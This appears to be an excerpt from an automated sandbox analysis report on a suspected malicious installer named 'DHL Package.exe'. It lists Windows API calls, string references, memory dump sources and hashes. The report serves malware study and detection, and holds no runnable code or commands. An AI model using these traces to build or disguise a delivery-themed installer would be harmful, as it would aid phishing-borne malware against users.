                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                • String ID: %ls=%ls$[Rename]
                                                                                                • API String ID: 2171350718-461813615
                                                                                                • Opcode ID: 29587da316c6c599c0e1183c46a51f077245d4dc447ecd9698dd2c76f7489909
                                                                                                • Instruction ID: 12f543f5511dcafe86fd679503ff52a70677b7710d95204b96aa1b9436a2079a
                                                                                                • Opcode Fuzzy Hash: 29587da316c6c599c0e1183c46a51f077245d4dc447ecd9698dd2c76f7489909
                                                                                                • Instruction Fuzzy Hash: AD310271200715BFC2206B659D48F2B3AACDF41714F16003ABD86BA2D3DA3DAD1186BD
                                                                                                APIs
                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,77163420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Package.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 004066ED
                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 004066FC
                                                                                                • CharNextW.USER32(?,00000000,77163420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Package.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406701
                                                                                                • CharPrevW.USER32(?,?,77163420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Package.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406714
                                                                                                Strings
                                                                                                • *?|<>/":, xrefs: 004066DC
                                                                                                • "C:\Users\user\Desktop\DHL Package.exe", xrefs: 0040668A
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040668B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Next$Prev
                                                                                                • String ID: "C:\Users\user\Desktop\DHL Package.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 589700163-3418220073
                                                                                                • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                                                • Instruction ID: c93b7236ce9398e1af64c827f7f3df25a4e663042e3c0a86589bb20fd507ce77
                                                                                                • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                                                • Instruction Fuzzy Hash: 6111CB2580061195DB3037548C84B7762E8EF547A4F52443FED86B32C0E77D5CA286BD
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 004043B5
                                                                                                • GetSysColor.USER32(00000000), ref: 004043F3
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004043FF
                                                                                                • SetBkMode.GDI32(?,?), ref: 0040440B
                                                                                                • GetSysColor.USER32(?), ref: 0040441E
                                                                                                • SetBkColor.GDI32(?,?), ref: 0040442E
                                                                                                • DeleteObject.GDI32(?), ref: 00404448
                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404452
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2320649405-0
                                                                                                • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                                • Instruction ID: 9b2ff1ab0d94660d7576f8ed4a98babdba82e7b09994482354a54f078556bf7c
                                                                                                • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                                • Instruction Fuzzy Hash: 9B2162715007089BCB20DF38D948B5BBBF8AF80714B04892EE996A26E1D734E904CF59
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D07
                                                                                                • GetMessagePos.USER32 ref: 00404D0F
                                                                                                • ScreenToClient.USER32(?,?), ref: 00404D29
                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D3B
                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D61
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                • String ID: f
                                                                                                • API String ID: 41195575-1993550816
                                                                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                • Instruction ID: 38a9b76ebff3d9b0285b36f379b71c5e366e7bff37b4726e352de3fe70b617dc
                                                                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                • Instruction Fuzzy Hash: DF014C71900219BBDB10DBA4DD85BFEBBB8AF95B11F10012BBA50B61C0D6B49A058BA5
                                                                                                APIs
                                                                                                • GetDC.USER32(?), ref: 00401E51
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                • String ID: Times New Roman
                                                                                                • API String ID: 3808545654-927190056
                                                                                                • Opcode ID: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                                                                                • Instruction ID: b60ccfaacb74251373a9760c042081773c0d6d705e51916df09e3ce9171beb14
                                                                                                • Opcode Fuzzy Hash: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                                                                                • Instruction Fuzzy Hash: 2701D871950650EFEB006BB4AE89BDA3FB0AF55301F10493AF141B71E2C6B90404DB3D
                                                                                                APIs
                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                                                                                • MulDiv.KERNEL32(0005582C,00000064,000561C0), ref: 00402F74
                                                                                                • wsprintfW.USER32 ref: 00402F84
                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402F94
                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                                                                                Strings
                                                                                                • verifying installer: %d%%, xrefs: 00402F7E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                • String ID: verifying installer: %d%%
                                                                                                • API String ID: 1451636040-82062127
                                                                                                • Opcode ID: fdbbe4e25b196e951a31d1700121d0a4c19e0197fdf79c60d2d61a266d2935a7
                                                                                                • Instruction ID: f70e2e9d3cdf76f376be3492476da2a97ecf935c4d8f5b4406c9d83c61a08eb5
                                                                                                • Opcode Fuzzy Hash: fdbbe4e25b196e951a31d1700121d0a4c19e0197fdf79c60d2d61a266d2935a7
                                                                                                • Instruction Fuzzy Hash: F7014470640209BBEF209F60DE4AFEA3B79FB44345F008039FA06A51D1DBB989559F5C
                                                                                                APIs
                                                                                                  • Part of subcall function 6CA7121B: GlobalAlloc.KERNELBASE(00000040,?,6CA7123B,?,6CA712DF,00000019,6CA711BE,-000000A0), ref: 6CA71225
                                                                                                • GlobalFree.KERNEL32(?), ref: 6CA726A3
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6CA726D8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$Free$Alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1780285237-0
                                                                                                • Opcode ID: cfc8da35fdb1bd412d3119ce4f4900b2b3ea2512db2d350d9edc76d3bed31132
                                                                                                • Instruction ID: 4f7d6494a165c2abbd9302f0b96d4aa13e5db2f12b5d29109486425e126ea3bf
                                                                                                • Opcode Fuzzy Hash: cfc8da35fdb1bd412d3119ce4f4900b2b3ea2512db2d350d9edc76d3bed31132
                                                                                                • Instruction Fuzzy Hash: 93319439704212DFDB2A8F64CD9CCAA77B6FB87304714862AF20187A51C735988ADF71
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                                                                                • GlobalFree.KERNEL32(?), ref: 004029F0
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                • String ID:
                                                                                                • API String ID: 2667972263-0
                                                                                                • Opcode ID: fd7dbd5d37358c1cc163e2b69e48bc419add7a24fb657e083e5c8dbb9c2d7a53
                                                                                                • Instruction ID: ed14628ef15dceb457173a83ab12e15034626edc11f01d0ebe9f464a1ada349c
                                                                                                • Opcode Fuzzy Hash: fd7dbd5d37358c1cc163e2b69e48bc419add7a24fb657e083e5c8dbb9c2d7a53
                                                                                                • Instruction Fuzzy Hash: A821C171800128BBCF216FA5DE49D9F7E79EF05364F20023AF564762E1CB794D419BA8
                                                                                                APIs
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6CA72522
                                                                                                  • Part of subcall function 6CA7122C: lstrcpynW.KERNEL32(00000000,?,6CA712DF,00000019,6CA711BE,-000000A0), ref: 6CA7123C
                                                                                                • GlobalAlloc.KERNEL32(00000040), ref: 6CA724A8
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6CA724C3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                • String ID:
                                                                                                • API String ID: 4216380887-0
                                                                                                • Opcode ID: 277f8ab8c4de6faff57f8f3ddf30bbb990f6bee4c057fb935c7a84e7aad047d0
                                                                                                • Instruction ID: 0145818afbd804155f4e2f5b184ebb3d205a9e405a2e28fc657415facc6e656c
                                                                                                • Opcode Fuzzy Hash: 277f8ab8c4de6faff57f8f3ddf30bbb990f6bee4c057fb935c7a84e7aad047d0
                                                                                                • Instruction Fuzzy Hash: 4441E2F8108305EFC738DF64C858A6677F8FB49304F008A2DE54A87A81D734A58ACB71
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                • String ID:
                                                                                                • API String ID: 1849352358-0
                                                                                                • Opcode ID: 78de8004f446787f372156ede0f2d89c690e9876039cb0b07cc28f686e634743
                                                                                                • Instruction ID: 4c6ae9b1abf83e60acb3738700a7a9d8e0f5f354904a09afb896d410ef8a521a
                                                                                                • Opcode Fuzzy Hash: 78de8004f446787f372156ede0f2d89c690e9876039cb0b07cc28f686e634743
                                                                                                • Instruction Fuzzy Hash: CE212672A00119AFCB05CFA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                                                                                                APIs
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6CA72238,?,00000808), ref: 6CA71635
                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6CA72238,?,00000808), ref: 6CA7163C
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6CA72238,?,00000808), ref: 6CA71650
                                                                                                • GetProcAddress.KERNEL32(6CA72238,00000000), ref: 6CA71657
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6CA71660
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                • String ID:
                                                                                                • API String ID: 1148316912-0
                                                                                                • Opcode ID: 3eab3020f2634439a8a7f4b13bd809008b04a146ede367ea2ca02809a8c3706e
                                                                                                • Instruction ID: 2ef8da6386c4866cefe20c3cef5f6b3386a44ba0db82986356f623de0ff79eb6
                                                                                                • Opcode Fuzzy Hash: 3eab3020f2634439a8a7f4b13bd809008b04a146ede367ea2ca02809a8c3706e
                                                                                                • Instruction Fuzzy Hash: 16F01C762062397BDA2116A68C4CC9BBEACEF8B2F5B114211F628921A086654C03DBF1
                                                                                                APIs
                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Timeout
                                                                                                • String ID: !
                                                                                                • API String ID: 1777923405-2657877971
                                                                                                • Opcode ID: 85a27d883e9730f87e0fcbf2f18326d15f90d0f3bc73a62618d738046c98a18f
                                                                                                • Instruction ID: dd4700ba4ce2c01fdcac70281bc34cd4026078c78447772ebe71ed50cab348e7
                                                                                                • Opcode Fuzzy Hash: 85a27d883e9730f87e0fcbf2f18326d15f90d0f3bc73a62618d738046c98a18f
                                                                                                • Instruction Fuzzy Hash: 3C21AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CBA8
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C7F
                                                                                                • wsprintfW.USER32 ref: 00404C88
                                                                                                • SetDlgItemTextW.USER32(?,00423708), ref: 00404C9B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                • String ID: %u.%u%s%s
                                                                                                • API String ID: 3540041739-3551169577
                                                                                                • Opcode ID: 834fd4594fd84455a21b844807ea957d96961a2cd877ff6e353b70df3a826163
                                                                                                • Instruction ID: 7c0a82a5d8c5e130c70e624adf1be80dcdc0ad06cf4f4d66f209f919317c7709
                                                                                                • Opcode Fuzzy Hash: 834fd4594fd84455a21b844807ea957d96961a2cd877ff6e353b70df3a826163
                                                                                                • Instruction Fuzzy Hash: 9B11D5736041283BEB00666D9C45EDE3298DBC5334F264237FA26F61D1E978CC2286E8
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00405CB6
                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00405CC0
                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405CD2
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CB0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
